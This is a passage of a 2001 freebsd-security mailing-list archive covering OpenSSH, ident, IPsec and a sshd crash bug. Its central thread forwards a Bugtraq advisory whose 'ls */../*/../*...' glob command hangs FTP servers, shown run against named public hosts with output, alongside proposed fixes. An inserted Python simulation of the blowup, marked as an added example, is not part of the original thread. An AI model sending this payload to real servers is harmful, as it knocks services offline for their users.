One suggestion I would have is to pop to www.nessus.org, and use the scanner they provide. It can output reports in HTML and so forth, with pretty graphics for PHBs. However, it can sometimes trigger false alarms, so I'd run it against the boxes and check the results by hand.

[I've found this very useful when I suddenly get thrown into 500 boxes, all running different versions of OS's.]

--
"I think our users are a lazy bunch of elitist snobs when it comes to
advocacy." -- Poul-Henning Kamp on the FreeBSD community.
From owner-freebsd-security Fri Mar 16 04:45:04 2001
Date: Fri, 16 Mar 2001 14:44:17 +0200
From: Peter Pentchev
To: Shoichi Sakane
Cc: kris@obsecurity.org, freebsd-security@FreeBSD.ORG
Subject: Re: What's vulnerable?
Message-ID: <20010316144417.A22302@ringworld.oblivion.bg>
References: <20010316014004.A86953@mollari.cthul.hu> <20010316192556Q.sakane@ydc.co.jp>
In-Reply-To: <20010316192556Q.sakane@ydc.co.jp>

On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote:
> > > What I really need to know is what vulnerabilities exist on each box -
> > > so that I can present the boss with a risk assessment, and make him
> > > decide if the box stays as is, or gets a make world.
>
> > Read the advisories.
>
> Why doesn't the maintainer of the openssh port upgrade its version?
> The current version of the port is openssh 2.2.0, which has some vulnerability.

The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0 'port revision' 2. The 'port revision' was bumped twice to indicate important security fixes. The 'some vulnerability' you are referring to is probably the Bleichenbacher attack, which affected nearly all SSH servers at the time; a fix was promptly added to the FreeBSD port.
G'luck,
Peter

--
If I had finished this sentence,

From owner-freebsd-security Fri Mar 16 04:51:26 2001
Date: Fri, 16 Mar 2001 14:50:39 +0200
From: Peter Pentchev
To: Lukasz Pawlik
Cc: freebsd-security@freebsd.org
Subject: Re: Invalid hostname
Message-ID: <20010316145039.B22302@ringworld.oblivion.bg>
In-Reply-To: <20010316103954.A24855@btk.za.net>

On Fri, Mar 16, 2001 at 10:39:54AM +0000, Lukasz Pawlik wrote:
> Hello,
> I'd like to ask for a little help. I don't understand one record
> which is printed by last.
> ash   ttyp2   invalid hostname   Ndz 11 Mar 19:07 - 20:13  (01:06)
>
> What is the 'invalid hostname'? If DNS failed, why is there no IP?
> Can someone explain it to me?
> Lukasz

'invalid hostname' is what /usr/bin/login puts into the wtmp record when it (login) is started with an '-h hostname' argument and then the DNS lookup of the specified hostname fails. Thus, login cannot put an IP address there, 'cause it's just the IP address lookup that failed :)

The fun question is how login got started with an invalid hostname passed; how did the user in question log in to the machine? Apparently it was over the network; was it a telnet, SSH or some other kind of session?

G'luck,
Peter

--
If there were no counterfactuals, this sentence would not have been paradoxical.
From owner-freebsd-security Fri Mar 16 05:13:09 2001
Message-Id: <3AB21141.0000E1.28395@frodo.searchcanada.ca>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Cc: bright@wintelcom.net
From: "Michael Richards" X-Fastmail-IP: 24.43.130.237 Date: Fri, 16 Mar 2001 08:12:33 -0500 (EST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------Boundary-00=_XOKA015BHVCNTT4D7TH0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit Normally when I write code to sanitise a user-entered path with glob or .. in it I process the string to remove any directory name succeeded by a '/..' There is of course a problem with this generalised optimisation. /nonexistent/../existent/ succeeds where it shouldn't. However, when you apply it to a glob, it is implied that '*/..' must exist. In this case, I believe it is valid to remove any iteration of '*/..' from the string. This may still, however, leave a crafty combination of '?' to cause the same problem. -Michael >> Actually I think this highly depends on HOW MANY files and >> directories FTPD can access. >> >> I didn't see any damage with a jailed FTPD with 1 directory and 2 >> files. > > The only reason you didn't see a problem was because you had > only one directory. > > The DoS works via a simple mechanism. > > if you have a dir with two directories in it 'a' and 'b' > > */../ -> a/.. b/.. > */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/.. > > basically for each ../*/ you do a power N where N is the number > of directories. 
_________________________________________________________________ http://fastmail.ca/ - Fast Free Web Email for Canadians --------------Boundary-00=_XOKA015BHVCNTT4D7TH0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 5:52:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 8A08037B718 for ; Fri, 16 Mar 2001 05:52:37 -0800 (PST) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id PAA16561 for ; Fri, 16 Mar 2001 15:02:57 GMT Message-Id: <200103161502.PAA16561@mailgate.kechara.net> Date: Fri, 16 Mar 2001 13:56:08 -0000 To: freebsd-security@freebsd.org From: Lee Smallbone Subject: Re: Multiple vendors FTP denial of service (fwd) Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 4.2-RELEASE, regular user, regular home directory (snipped) /../www/62.49.139.3_3-year.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.html www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/btareshit.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.old 226 Transfer complete. ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec. ftp> 15/03/2001 22:21:16, Attila Nagy wrote: >FreeBSD isn't listed, but also vulnerable, at least with the FTPd in >-STABLE. > >---------- Forwarded message ---------- >Date: Thu, 15 Mar 2001 09:34:09 +0100 
>From: "Frank DENIS (Jedi/Sector One)" >To: BUGTRAQ@SECURITYFOCUS.COM >Subject: Multiple vendors FTP denial of service > >- Proftpd built-in 'ls' command has a globbing bug that allows remote >denial-of-service. > > Here's a simple exploit, tested on the Proftpd site : > >$ ftp ftp.proftpd.org >... >Name (ftp.proftpd.org:j): ftp >... >230 Anonymous access granted, restrictions apply. >Remote system type is UNIX. >Using binary mode to transfer files. >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 Entering Passive Mode (216,10,40,219,4,111). >421 Service not available, remote server timed out. Connection closed > > That command takes 100% CPU time on the server. It can lead to an easy >DOS even if few remote simultaneous connections are allowed. > > Other FTP servers may be concerned as well. Here are various tries : > >- NetBSD FTP showed the same behavior as Proftpd : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >200 EPRT command successful. >(long delay) >421 Service not available, remote server timed out. Connection closed > >So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a >possible DOS. Other BSD FTP may be affected as well. > >- Microsoft FTP Service (Version 5.0) seems also confused by the command : >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >500 'EPSV': command not understood >227 Entering Passive Mode (207,46,133,140,4,223). >200 PORT command successful. >150 Opening ASCII mode data connection for file list. >(very long delay... nothing happens...) > >- Publicfile refuses the command : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 =131,193,178,181,97,222 >550 Sorry, I can't open that file: file does not exist. > >- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and >displayed. > >- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard >expression to *" and the 'ls *' output. 
> > > Maintainers of vulnerable servers have been warned of this bug. > >-- > -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=- > LINAGORA SA (Paris, France) : http://www.linagora.com > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 5:59:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id A88D437B719 for ; Fri, 16 Mar 2001 05:59:20 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f2GDxH111551; Fri, 16 Mar 2001 14:59:17 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: lee@kechara.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service (fwd) In-Reply-To: Your message of "Fri, 16 Mar 2001 13:56:08 GMT." <200103161502.PAA16561@mailgate.kechara.net> Date: Fri, 16 Mar 2001 14:59:17 +0100 Message-ID: <11549.984751157@critter> 
From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200103161502.PAA16561@mailgate.kechara.net>, Lee Smallbone writes: >4.2-RELEASE, regular user, regular home directory > >(snipped) > >/../www/62.49.139.3_3-year.png >www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www >/../www/62.49.139.3_3.html >www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www >/../www/btareshit.png >www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www >/../www/62.49.139.3_3.old >226 Transfer complete. >ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec. >ftp> Now, try to create a 'foo' directory next to your 'www' directory... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 6:31: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from gyw.com (gyw.com [209.55.67.177]) by hub.freebsd.org (Postfix) with ESMTP id 90AEE37B719 for ; Fri, 16 Mar 2001 06:30:59 -0800 (PST) (envelope-from tjk@tksoft.com) Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged)) by gyw.com (8.8.8/8.8.8) with ESMTP id GAA26051; Fri, 16 Mar 2001 06:47:31 -0800 Received: (from tjk@tksoft.com) by smtp3.tksoft.com (8.8.8/8.8.8) id GAA17664; Fri, 16 Mar 2001 06:17:49 -0800 
From: "tjk@tksoft.com" Message-Id: <200103161417.GAA17664@smtp3.tksoft.com> Subject: Re: Multiple vendors FTP denial of service (fwd) To: bright@wintelcom.net (Alfred Perlstein) Date: Fri, 16 Mar 2001 06:17:48 -0800 (PST) Cc: apina@infolink.com.br (Antonio Carlos Pina), freebsd-security@FreeBSD.ORG In-Reply-To: <20010315155234.G29888@fw.wintelcom.net> from "Alfred Perlstein" at Mar 15, 2001 03:52:34 PM X-Info: None MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One solution I can think of is to use a hash table for interpreting the glob results, and count duplicate listings of directories/files. Then truncate the results if the duplicates exceed x times valid keys in the hash (or report an error, or both.) I don't know if there is a set of hash routines available, but if not, one could use a tree (tsearch) to accomplish the same. All this depends on the file listings being first converted to the shortest path to the file. I.e. "/etc/../etc/yadayada.txt" would become "/etc/yadayada.txt" before being added to the list. I presume this is already done. The other solution is to always reduce the original path to its shortest form, to avoid recursive listings of directories. Sounds like a simpler and faster approach. If only someone's got foolproof logic to accomplish this. Removing certain strings might work. Sounds like frustrating extra work, but since there is a problem, what else are you going to do? Troy > > * Antonio Carlos Pina [010315 15:17] wrote: > > Hello, > > > > Actually I think this highly depends on HOW MANY files and > > directories FTPD can access. > > > > I didn't see any damage with a jailed FTPD with 1 directory and 2 > > files. > > The only reason you didn't see a problem was because you had > only one directory. > > The DoS works via a simple mechanism. > > if you have a dir with two directories in it 'a' and 'b' > > */../ -> a/.. 
b/.. > */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/.. > > basically for each ../*/ you do a power N where N is the number > of directories. > > How could this be fixed? I think it's somewhat simple, > have glob() maintain a truncated version of paths and > make sure that any collisions are detected. > > Of course this is only speculation since I haven't looked > at the code. > > -- > -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 8:39:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mars.entic.net (mars.entic.net [63.125.62.132]) by hub.freebsd.org (Postfix) with ESMTP id 0B09637B718 for ; Fri, 16 Mar 2001 08:39:11 -0800 (PST) (envelope-from aj@entic.net) Received: (qmail 18072 invoked by uid 100); 16 Mar 2001 16:39:07 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 Mar 2001 16:39:07 -0000 Date: Fri, 16 Mar 2001 08:39:07 -0800 (PST) 
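[Added example, not code from the thread, ftpd or libc: a small Python simulation of the expansion Alfred describes above (each '*/..' step multiplies the candidate list by the number of directories, so the work grows as N to the power of the number of steps) beside the fix Alfred and Troy suggest, collapsing every partial result to its resolved path and keeping only the distinct ones. The directory listing is constructed in memory, nothing touches a real filesystem or ftpd, and treating '..' at the top level as staying at the top level (what a chrooted ftpd would see) is an assumption of the simulation.]

```python
import fnmatch
import posixpath


def make_tree(n_dirs):
    """Constructed in-memory listing: the ftp root ("") holds n_dirs
    subdirectories a, b, c, ... and each subdirectory holds one file."""
    dirs = [chr(ord("a") + i) for i in range(n_dirs)]
    tree = {"": list(dirs)}
    for d in dirs:
        tree[d] = [d + ".txt"]
    return tree


def build_pattern(repeats):
    """The Bugtraq pattern: '*/..' repeated `repeats` times, then a final '*'."""
    return "/".join(["*", ".."] * repeats + ["*"])


def expand(tree, pattern, canonicalize):
    """Expand `pattern` one segment at a time against `tree`.

    Every candidate is (text, resolved): the textual path a naive glob hands
    back (e.g. 'a/../b/../a') and the directory it actually refers to.

    canonicalize=False mimics a glob that never collapses 'name/..': each '*'
    is re-expanded under every textual prefix, so the list grows N-fold per
    '*/..' step.

    canonicalize=True applies the thread's fix: after each segment the list
    is keyed by resolved path and one entry kept per key, so the work is
    bounded by the number of distinct paths.

    Simulation assumption: '..' at the root stays at the root (chroot view).
    """
    cands = [("", "")]
    for seg in pattern.split("/"):
        nxt = []
        for text, cur in cands:
            if seg == "..":
                nxt.append((posixpath.join(text, ".."), posixpath.dirname(cur)))
            elif seg == ".":
                nxt.append((posixpath.join(text, "."), cur))
            else:
                for name in tree.get(cur, []):
                    if fnmatch.fnmatchcase(name, seg):
                        nxt.append((posixpath.join(text, name),
                                    posixpath.join(cur, name)))
        if canonicalize:
            # Collapse to distinct resolved paths before the next '*' runs.
            nxt = list({cur: (cur, cur) for _, cur in nxt}.values())
        cands = nxt
    return sorted(text for text, _ in cands)


def blowup(n_dirs, repeats):
    """Return (naive_count, canonical_count) for `n_dirs` directories and
    `repeats` '*/..' steps.  Naive is n_dirs ** (repeats + 1); canonical
    stays at n_dirs."""
    tree = make_tree(n_dirs)
    pattern = build_pattern(repeats)
    return (len(expand(tree, pattern, False)),
            len(expand(tree, pattern, True)))


if __name__ == "__main__":
    for k in range(1, 6):
        print("repeats=%d  naive=%d  canonical=%d" % ((k,) + blowup(3, k)))
    # A single directory never blows up, which is why a one-directory jail
    # showed no damage.
    print("one dir, 10 repeats:", blowup(1, 10))
```

Run as a script it prints the naive and canonical counts for one to five repetitions of '*/..' over three directories (3^2 up to 3^6 versus a constant 3); with a single directory both counts stay at 1. Real ftpd behaviour depends on libc glob() and whether the daemon is chrooted, so treat the numbers as the shape of the problem rather than a measurement of any server.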
From: Anil Jangity To: Subject: Re: Multiple vendors FTP denial of service In-Reply-To: <20010315215913.A70990@mollari.cthul.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris/All, FTPD is run as root (at least on my machine). I don't want to limit root resources, since I am not sure exactly what a good ball park figure for root would be... I looked in ftpd(8) for some way to make it run as another user (at least after it starts up) but no luck. So, my question is, how do you propose we resource limit ftpd as you suggest via login.conf? Thanks Anil @ I'm pretty sure (but haven't tested) that resource limits will prevent @ this problem. Your ftpd shouldn't be using large amount of memory @ under normal operating procedures, so you can set those to reasonable @ values and not suffer any ill effects. @ @ Kris @ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 8:46:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 8A91A37B719 for ; Fri, 16 Mar 2001 08:46:46 -0800 (PST) (envelope-from mit@mitayai.net) Received: (from root@localhost) by castle.dreaming.org (8.11.3/8.11.2) id f2GGkeu37698; Fri, 16 Mar 2001 11:46:40 -0500 (EST) (envelope-from mit@mitayai.net) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.3/8.11.2av) with SMTP id f2GGkca37690; Fri, 16 Mar 2001 11:46:38 -0500 (EST) (envelope-from mit@mitayai.net) 
From: "Will Mitayai Keeso Rowe" To: "Peter McGarvey" , "freebsd-security" Subject: RE: What's vunerable? Date: Fri, 16 Mar 2001 11:43:40 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org inherited? need a lot of work? then assume everything is vulnerable due to ex-employees, past trojan horses, bad administrative practices and configurations, etc. go through the FreeBSD Security Advisories at http://www.freebsd.org/security/#adv for all the listed advisories. make sure you pay attention to all the installed packages, ports, and user-installed third-party stuff. -Mit :-----Original Message----- :From: owner-freebsd-security@FreeBSD.ORG :[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter McGarvey :Sent: March 16, 2001 04:25 AM :To: freebsd-security :Subject: What's vunerable? : : :I've just inherited several FreeBSD boxes. The versions range from :3.2_RELEASE to 4.1_RELEASE. : :On the BSD boxes I already maintain I cvsup and make world on a monthly :basis - or as soon as I see a CERT advisory that I know relates to :something that can bite. But the inherited boxes need a lot of work, :and I cannot guarantee to "The Powers That Be" that a make world won't :break the box. : :What I really need to know is what vulnerabilities exist on each box - :so that I can present the boss with a risk assessment, and make him :decide if the box stays as is, or gets a make world. : :So any advice anyone can give me, on how to find out what's vulnerable :with any particular FreeBSD version, would be greatly appreciated. 
: :-- :TTFN, FNORD : :Peter McGarvey :System Administrator :Network Operations, VIA Networks UK : :To Unsubscribe: send mail to majordomo@FreeBSD.org :with "unsubscribe freebsd-security" in the body of the message : : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 8:54:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 4996537B718 for ; Fri, 16 Mar 2001 08:54:42 -0800 (PST) (envelope-from wes@softweyr.com) Received: from [127.0.0.1] (helo=softweyr.com ident=4a656828bf96df23684bddfc4d0922ae) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14dxS9-0000Ko-00; Fri, 16 Mar 2001 09:51:50 -0700 Message-ID: <3AB244A5.315DFD16@softweyr.com> Date: Fri, 16 Mar 2001 09:51:49 -0700 
From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nate Williams Cc: Adam Laurie , Ronan Lucio , security@FreeBSD.ORG Subject: Re: Port 113 References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams wrote: > > > > > Could anybody say me when I need to allow the port 113 > > > > in the firewall? > > > > > > *Need* for auth is a strong word. However, it does tend to speed up > > > email transfers if you enable a version that always responds true. > > > > > > So, any external SMTP servers you have *should* have this port enabled. > > > > > > > What services use this port? > > > > > > I know that SMTP uses it, and I believe that ftpd uses it, and I believe > > > irc also uses it. > > > > smtp does not need to use it - you can achieve the same speedy transfers > > by telling your smtp server not to bother. e.g. for sendmail: > > > > O Timeout.ident=0s > > My local sendmail doesn't use *my* ident server, but remote sendmail > servers use *my* ident server, so using ident locally speeds up mail > transfers *to* my host. > > I certainly don't use ident for local email. :) To quote a relatively unknown identd server, "Fools trust ident!" -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 9:57: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from silver.teardrop.org (silver.teardrop.org [205.181.101.128]) by hub.freebsd.org (Postfix) with ESMTP id 8368837B71D for ; Fri, 16 Mar 2001 09:57:00 -0800 (PST) (envelope-from snow@teardrop.org) Received: (from snow@localhost) by silver.teardrop.org (8.11.2/8.11.1) id f2GHtWC66126; Fri, 16 Mar 2001 12:55:33 -0500 (EST) (envelope-from snow@teardrop.org) Date: Fri, 16 Mar 2001 12:55:32 -0500 
From: James Snow To: Kris Kennaway Cc: Brooks Davis , Alex Popa , security@FreeBSD.ORG Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010316125532.A65814@teardrop.org> References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010312152215.A94640@mollari.cthul.hu>; from kris@obsecurity.org on Mon, Mar 12, 2001 at 03:22:15PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Mar 12, 2001 at 03:22:15PM -0800, Kris Kennaway wrote: > On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote: > > On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote: > > > I am not really sure what this means (could mean a lot of things, > > > including bad memory on my machine), but here are the facts: > > > > This reminds me of something I noticed during the last discussion of > > ssh I got involved in and completely forgot about. If you create an > > account with a bad shell (say, /bin/false) and run the following command > > you get an immediate sshd core dump: > > > > ssh -t xxx@localhost /bin/sh > > > > Attempting to run gdb on the core appears to show that I'm in: > > > > #0 0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3 > > > > but the binary is stripped so I don't know and my /usr/obj is out of > > sync with my world at the moment so I figure running gdb against the > > unstripped binary is not productive. > > There's a PR open about this and Brian is looking into it - > indications are it's a simple bug and not a security problem, denial > of service or otherwise. I don't know whether or not it's exploitable, but I just ran up against this myself today. You can reproduce it by using ssh version 2 and giving sshd an invalid username. 
The problematic code is in src/crypto/openssh/auth2.c in input_userauth_request: 208 pw = getpwnam(user); 209 if (pw && allowed_user(pw) && strcmp(service, "ssh-connection")==0) { 210 authctxt->pw = pwcopy(pw); 211 authctxt->valid = 1; 212 debug2("input_userauth_request: setting up authctxt for %s", user); 213 #ifdef USE_PAM 214 start_pam(pw); 215 #endif 216 } else { 217 log("input_userauth_request: illegal user %s", user); 218 } If you supply an invalid username, this line: 208 pw = getpwnam(user); will set pw to null. The if statement at line 209: 209 if (pw && ... will fail immediately because pw is null, and the code skips to: 216 } else { 217 log("input_userauth_request: ... 218 } Things fall down and go boom here: 231 if (authctxt->pw != NULL) { 232 lc = login_getpwclass(authctxt->pw); authctxt->pw never gets set to anything unless you enter the if, which we don't because of the pw pointer being null. So it points off into space, and login_getpwclass will cause a SIGSEGV when it tries to dereference it. My fix for this was to stick a 'authctxt->pw = NULL;' in the else block: 216 } else { 217 log("input_userauth_request: ... 218 authctxt->pw = NULL; 219 } Then you get this: input_userauth_request: illegal user nonexistant Failed password for NOUSER from 198.76.121.128 port 3150 ssh2 instead of this: input_userauth_request: illegal user nonexistant Segmentation fault (core dumped) I don't think this fix is ideal, as I think the log entry should continue to show the username the client tried to login with and not 'NOUSER,' but it will certainly close the hole, if indeed it is one. At least I'll sleep better tonight. I wasn't able to reproduce this under Linux and it doesn't occur using ssh1. Also, is anyone going to fix the pipe bug in sshd that causes all those annoying "Broken pipe" errors? I know there's a patch out there for it. 
-Snow To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 9:58: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34]) by hub.freebsd.org (Postfix) with ESMTP id 8CB3237B719 for ; Fri, 16 Mar 2001 09:57:58 -0800 (PST) (envelope-from ume@FreeBSD.org) Received: from localhost (IDENT:WR7wH86hkIS8CelPaXz3tP2/ovMRPW3y3dykVc1g8qX7AIRgsIQKw4zDFsROLHAt@localhost [::1]) (authenticated as ume with CRAM-MD5) by peace.mahoroba.org (8.11.3/8.11.3/peace) with ESMTP/inet6 id f2GHs2R54078; Sat, 17 Mar 2001 02:54:03 +0900 (JST) (envelope-from ume@FreeBSD.org) Date: Sat, 17 Mar 2001 02:53:58 +0900 (JST) Message-Id: <20010317.025358.74704976.ume@FreeBSD.org> To: itojun@iijlab.net Cc: jomor@ahpcns.com, mburgett@awen.com, freebsd-security@FreeBSD.ORG Subject: Re: IPSEC tunnel without gif? 
From: Hajimu UMEMOTO In-Reply-To: <19427.984720576@coconut.itojun.org> References: <3AB18AAC.9069CBF2@ahpcns.com> <19427.984720576@coconut.itojun.org> X-Mailer: xcite1.38> Mew version 1.95b97 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC X-URL: http://www.imasy.org/~ume/ X-OS: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> On Fri, 16 Mar 2001 14:29:36 +0900 >>>>> itojun@iijlab.net said: >> >The gateway that received the pings was transmitting ARP >> >requests but strangely, it was trying to get the hardware >> >address of the other tunnel endpoint rather than that of >> >the router in the middle. Since the ARP requests were never >> >answered, the ping response was never transmitted. itojun> so you are seeing ARP for tunnel inner addresses? itojun> http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85 itojun> should fix the above issue. not sure about freebsd merge status. Since there seemed to be no feedback from the originator of KAME PR 233, I had held off merging it from KAME. I just committed it. 
http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet6/ipsec.c.diff?r1=1.9&r2=1.10 -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 9:59:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail-100baset.rpi.edu [128.113.26.45]) by hub.freebsd.org (Postfix) with ESMTP id 0B15437B71C for ; Fri, 16 Mar 2001 09:59:38 -0800 (PST) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id MAA91764; Fri, 16 Mar 2001 12:59:35 -0500 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk> References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> Date: Fri, 16 Mar 2001 12:59:34 -0500 To: Peter McGarvey , freebsd-security 
